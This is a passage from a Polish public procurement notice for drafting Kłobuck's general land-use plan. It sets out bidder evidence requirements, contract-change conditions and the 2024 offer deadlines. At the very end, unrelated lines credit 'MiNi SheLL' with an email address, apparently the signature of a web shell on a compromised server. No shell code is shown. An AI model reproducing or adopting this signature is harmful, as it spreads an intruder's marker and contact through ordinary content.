przez Wykonawców, oświadczenia w<br/>zakresie pkt. 2 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>W przypadku korzystania przez Wykonawcę ze zdolności technicznych lub zawodowych<br/>podmiotów udostępniających zasoby, Wykonawca przedstawia wraz z oświadczeniem, o<br/>którym mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby, o<br/>aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu i spełnianiu<br/>warunków udziału w postępowaniu w zakresie podstaw do wykluczenia wskazanych w ust.<br/>2 pkt 2.1 oraz 2.2 (zał. nr 5a do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunków<br/>udziału w postępowaniu (określonych przez Zamawiającego w ust. 3 niniejszego rozdziału<br/>SWZ), na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia, w terminie nie<br/>krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych <br/>1) w celu wykazania spełniania warunku z ust. 3.4. pkt. 1 SWZ<br/>wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez<br/>nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zał. nr 6 do<br/>SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dla przeprowadzenia oceny ofert (tj. uzyskania określonej ilości punków w ramach kryterium<br/>doświadczenie projektanta) każdy Wykonawca zobowiązany jest:<br/>1) wskazać w Formularzu oferty z imienia i nazwiska osobę, która będzie pełnić funkcję<br/>projektanta i będzie brała udział w realizacji zamówienia (Zamawiający wymaga osobistego wykonywania świadczenia przez<br/>tę osobę);<br/>2) wymienić w Formularzu oferty:<br/>- nazwę aktu prawa miejscowego (dla planów miejscowych i zmian planów)<br/>- nazwę studium (dla studium uwarunkowań i kierunków zagospodarowania gminy i zmian studiów);<br/>- określenie publikatora (wojewódzkiego dziennika urzędowego) z numerem pozycji<br/>- określenie sygnatury właściwej uchwały Rady Gminy<br/>3) wykazać, że wskazana w Formularzu oferty osoba, brała udział w tworzeniu każdego z<br/>opracowań wymienionych w tabeli punktu 5 Formularza oferty. Dla wykazania tego należy<br/>przedłożyć wraz z ofertą dokumenty, inne niż oświadczenia własne Wykonawcy.<br/>Do dokumentów tych należą np.:<br/>- zawarte umowy, podpisane protokoły zdawczo – odbiorcze opracowań, zawierające nazwisko projektanta;<br/>- oświadczenie inwestora, potwierdzające że dedykowana osoba pełniła w wykazanych przedsięwzięciach funkcję<br/>projektanta;<br/>- referencje wystawione przez Inwestora dla Wykonawcy usługi, zawierające nazwisko projektanta; <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenie, że Wykonawca zapoznał się z warunkami zamówienia i z projektowanymi<br/>postanowieniami umowy do przedmiotowego zamówienia, oraz że przyjmuje ich treść bez<br/>żadnych zastrzeżeń – zgodnie z treścią zawartą w formularzu oferty, stanowiącym załącznik<br/>nr 1 do SWZ. Oświadczenie składa się, pod rygorem nieważności, w formie elektronicznej (w<br/>postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>2. Stosowne pełnomocnictwo(a) – w przypadku, gdy upoważnienie do podpisania oferty nie<br/>wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo z ewidencji<br/>działalności gospodarczej. Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W<br/>przypadku, gdy pełnomocnictwo zostało wystawione w postaci papierowej i opatrzone<br/>własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu, opatrzone<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>Poświadczenia zgodności cyfrowego odwzorowania z pełnomocnictwem w postaci papierowej<br/>może dokonać mocodawca (osoba/osoby wystawiające pełnomocnictwo) lub notariusz.<br/>3. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych<br/>się o udzielenie zamówienia publicznego.<br/>Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku, gdy<br/>pełnomocnictwo zostało wystawione w postaci papierowej i opatrzone własnoręcznym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym, poświadczającym<br/>zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia<br/>zgodności cyfrowego odwzorowania z pełnomocnictwem w postaci papierowej, może dokonać<br/>mocodawca (osoba/osoby wystawiające pełnomocnictwo) lub notariusz.<br/>4. Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby, do oddania do dyspozycji<br/>Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy<br/>środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów (o ile Wykonawca korzysta ze zdolności innych<br/>podmiotów na zasadach określonych w art. 118 ustawy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy to jednak spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki, bądź<br/>wszyscy wspólnicy podpiszą ofertę.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne<br/>pełnomocnictwo – zgodnie z ust. 4.3. rozdz. XVI SWZ – nie dotyczy to jednak spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź<br/>wszyscy wspólnicy podpiszą ofertę.<br/>3. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>4. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie, o którym mowa w art.<br/>125 ustawy (ust. 3.1. rozdziału XVI SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy Pzp, strony dopuszczają możliwość wprowadzania zmiany<br/>umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia<br/>którejkolwiek z następujących okoliczności:<br/>1) w zakresie terminu realizacji, w przypadku:<br/>a) opóźnienia organów administracji publicznej w wydaniu decyzji administracyjnych, uzgodnień, ekspertyz lub innych aktów<br/>administracyjnych niezbędnych do wykonania przedmiotu umowy, pomimo spełnienia przez Wykonawcę warunków ich<br/>uzyskania, w tym przede wszystkim złożenia przez Wykonawcę prawidłowego i kompletnego wniosku o ich wydanie,<br/>b) konieczności uzyskania wyroku sądu lub innego orzeczenia sądu albo organu administracji publicznej, którego uzyskanie<br/>nie było przewidziane w opisie przedmiotu zamówienia ani w żadnym innym dokumencie stanowiącym element<br/>dokumentacji postępowania o udzielenie zamówienia publicznego, a jest niezbędne celem wykonania obowiązków<br/>Wykonawcy wynikających z umowy,<br/>c) wystąpienia osób trzecich z roszczeniami lub ujawnienia się roszczeń osób trzecich, które uniemożliwiają dalsze<br/>wykonanie przedmiotu zamówienia, w szczególności uzyskanie odpowiednich decyzji, zezwoleń, uzgodnień wydawanych<br/>przez organy administracji publicznej,<br/>d) wszczęcia na wniosek jakiegokolwiek podmiotu lub wszczęcia z urzędu postępowania sądowego lub administracyjnego<br/>uniemożliwiającego wykonanie przedmiotu umowy przez Wykonawcę, w szczególności wstrzymującego możliwość<br/>uzyskania odpowiednich decyzji administracyjnych, uzgodnień, zezwoleń, ekspertyz lub innych aktów,<br/>e) zmiany opisu przedmiotu umowy lub innych obowiązków Wykonawcy w trakcie realizacji zamówienia zgodnie ust 1 pkt 2<br/>lub zmiany dopuszczalnej na podstawie przepisów ustawy,<br/>f) zmian obowiązujących przepisów prawa wpływających na termin wykonania przedmiotu umowy, w tym w szczególności<br/>nałożenia na Wykonawcę obowiązku uzyskania dodatkowych decyzji administracyjnych, uzgodnień, zezwoleń, ekspertyz lub<br/>innych aktów administracyjnych niezbędnych do wykonania przedmiotu umowy, których uzyskanie nie było konieczne na<br/>etapie składania ofert, z zastrzeżeniem, że termin wykonania umowy może ulec zmianie o czas, o jaki wyżej wskazane<br/>okoliczności wpłynęły na termin wykonania umowy przez Wykonawcę, to jest uniemożliwiły Wykonawcy terminową<br/>realizację przedmiotu umowy,<br/>g) wystąpienia konieczności ponowienia części procedury planistycznej,z zastrzeżeniem że termin może ulec wydłużeniu<br/>stosownie do wymagań terminów ustawowych wymaganych na ponowienie tej procedury,<br/>h) stwierdzenia przez Radę Miejską w Kłobucku konieczności dokonania zmian w przedstawionym projekcie uchwały w<br/>sprawie uchwalenia planu ogólnego Gminy Kłobuck lub jej części,<br/>i) stwierdzenia przez Wojewodę niezgodności z przepisami prawa uchwały Rady Miejskiej w Kłobucku w sprawie uchwalenia<br/>planu ogólnego wraz z załącznikiem oraz dokumentacji prac planistycznych;<br/>oraz innych okoliczności określonych szczegółowo w załączniku nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-22 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com